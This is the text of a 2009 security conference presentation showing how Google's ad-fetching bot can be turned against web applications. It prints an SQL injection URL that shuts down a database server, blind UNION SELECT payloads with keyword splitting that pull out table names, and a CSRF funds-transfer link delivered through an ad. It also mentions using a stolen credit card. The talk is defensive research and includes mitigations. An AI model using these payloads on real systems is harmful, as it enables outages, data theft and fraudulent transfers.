April 30, 2009 Infosecurity Europe 2009

gunpanicyInternet και Εφαρμογές Web

26 Ιουν 2012 (πριν από 5 χρόνια και 1 μήνα)

302 εμφανίσεις

Blame It On The Media(Bot)
Using Google’s Ads For Application Attacks
Amichai Shulman, CTO
April 30, 2009
Infosecurity Europe 2009
Agenda
Who’s Who?
Short History of Google Hacking
Introducing Google Attacks
Why Google Ads?
Attack Details
+
The Search of Death
+
Blindfolded Google SQL Injection
+
Cross Ads Request Forgery
Mitigation Techniques
Summary
Who’s who?
Amichai Shulman
+
CTO and Co-Founder of Imperva
+
More than 15 years experience with information security
+
10 years experience with application security in military and
commercial organizations
Research Team
+
Eldad Chai, Imperva
+
Ohad Lutzky, Technion Haifa
+
Tom Meiri, Technion Haifa
+
Guy Treger, Technion Haifa
Short History of Google Hacking
Google has been part of the hacking landscape for quite
a few years now
In the beginning
+
Classic Google Hacking – search for vulnerable applications
through Google
Past couple of years
+
Automated Google Hacking for vulnerable applications and
sensitive information
+
Google worms (automated, self propagating)
+
Malware distribution (use SEO to promote links to malware
delivery servers)
+
Malvertizing (Ads that link to malware delivery servers)
Introducing Google Attacks
Use Google servers to attack applications
+
Idea was discussed
as early as 2004
Motivation
+
Provide complete anonymity
+
No one suspects Google…
+
No one blocks Google
+
Google servers have deeper reach into application than
anonymous web users
Google’s Deep Reach - Example Direct Access to Expert-
Exchage
Google’s Deep Reach - Example Search Google and
use Google Cache
Why Use Google Ads
Standard Google crawling botis rather unpredictable, at
least with respect to timing
Idea came when reviewing application logs for an
application that embedded Google Ads
Google Ads possesses the following characteristics
+
MediaBot can be synchronously invoked by attacker
+
AdWords placement can be made very predictable
Google Ads Mechanics
2) Content for
url
,
Placeholder for ads
Script for Google Ads
3) Retrieve Ads for
url
Using
http://pagead2.googlesyndication.com/pagead/ads
4) GET
url
6) Ads
Web Server
Client
5) Content
for
url
1) GET
url
The Search of Death
Use MediaBotto launch an attack that does not require
server response
Immediate effects can be
+
DoS (application crash)
+
Defacement
+
Arbitrary code execution
How
+
http://pagead2.googlesyndication.com/pagead/ads
+
Takes a
url
parameter without any sanitation
+
url
may refer to any host (not limited to hosts that actually
serve ads)
+
MediaBot sends a GET request for the target URL
The Search of Death (cont.)
More details
+
Google limits the size of
url
thus complex attack vectors cannot
be used directly
+
Google follows redirect we therefore used TinyURL for complex
attack vectors
Observed effects
+
For a demo application, based on MS SQL Server, with an SQL
Injection vulnerability we were able to invoke the following url:
+
http://www.superveda.com/showprods.asp?catId=99
9 shutdown –
+
The application went down as soon as it was visited by
MediaBot
The Search of Death (cont.)
We have actually seen strands of this attack being used
in the wild
Blindfolded Google SQL Injection
SQL Injection attacks are commonly used for sensitive
information retrieval
The challenge is to extract data through the MediaBot
server
How
+
Google Ads uses page content to determine the set of ads
+
An attacker can review the list of ads returned by Google
+
Craft the attack vector in a way that affects page content
enough to influence the list of ads chosen by Google
+
Make sure page contents are different enough for different
possible responses
Blindfolded Google SQL Injection (cont.)
More details
+
Consider the following URL:
+
http://www.superveda.com/showproducts.asp?catID=9999’
UNION SELECT ‘donald duck, mickey mouse, goofy’, null –
+
For a successful attack, ads related to Disney characters should
be served by Google Ads, for a failed attempt, default set of ads
is expected
+
Life’s never that simple – Google Ads gives priority to keywords
found in the URL itself…
+
Break keywords in URL to be unrecognizable by Google:
+
http://www.superveda.com/showproducts.asp?catID=9999’
UNION SELECT ‘do’%2B’na’%2B’ld’’%2B’ du’%2B’ck, ’%2B’
mi’%2B’ck’%2B’ey’%2B’ mo’%2B’us’%2B’e, g’%2B’oo’%2B’fy’,
null -
Blindfolded Google SQL Injection (cont.)
Yet more details
+
Data must be extracted one character at a time
+
http://www.superveda.com/showproducts.asp?catID=9999’
UNION SELECT null, ‘do’%2B’na’%2B’ld’’%2B’ du’%2B’ck,
’%2B’ mi’%2B’ck’%2B’ey’%2B’ mo’%2B’us’%2B’e,
g’%2B’oo’%2B’fy’, null from information_schema.tables
where 1 in (select 1 from information_schema.tables
where lower(table_name) > ‘aa’ and lower(table_name) <
‘ab’) –
+
It is tedious as it seems!
+
Use automation…
Cross Site Ads Forgery
Cross Site Request Forgery (CSRF) attacks rely on the
victim being logged-in to the target application when
visiting an attacker controlled page
+
This is opportunistic
The answer is (ask Twitter) to use ads
+
By focusing the ads an attacker can make sure that with very
high probability when an ad is clicked the user is logged in to
the target application
Cross Site Ads Forgery (cont.)
How
+
Create an AdWords account (need stolen credit card…)
+
Create a campaign targeted to the victim application
+
Create an ad that includes a link to the target transaction within
the victim application and (of course) a compelling text
Results
+
We targeted a demo online banking application and chose the link
within our ad to be the following
+
http://www.mybank.com/bankapp/tx_funds.asp?to_acco
unt=123456&amount=10000
+
It instructs the application to transfer 10K$ from the current
account to the account 12345!
+
Considering Google’s pay-per-click billing scheme it seems like a
very cost effective campaign!
Mitigation Techniques
What I expect from Google
+
Make sure MediaBot only scans hosts enlisted for AdSense
+
Sanitize URLs given to MediaBot for known attack patterns
+
When adding a link to an ad make sure that the AdWords
account owner also owns the target of the link
What application owner can do
+
Block access of MediaBot if your server does not serve Google
Ads
+
If you do serve Google Ads, restrict MediaBot access to only
those URLs that serve them.
+
Never trust a request from any IP. Apply all security checks and
rules to any request even if coming from Google
Summary
We have shown that specific Google services can be
exploited to directly attack applications.
+
The actual list of exploitable services is probably not limited to
the ones demonstrated here (e.g. we know Google Translate
can be abused)
+
Other online services (other search engines, applications like
Dapper) can probably be abused just the same
Using automation of classic Google Hacking an attacker
can find a large set of potential target applications
regardless of their value or visibility
Summary
No one is safe
+
You can’t claim safety by “low visibility” or “low value”
+
Attackers use search engine related services to find your
application and (as shown today) exploit it.
Regardless of application size and visibility you must
apply web application security solutions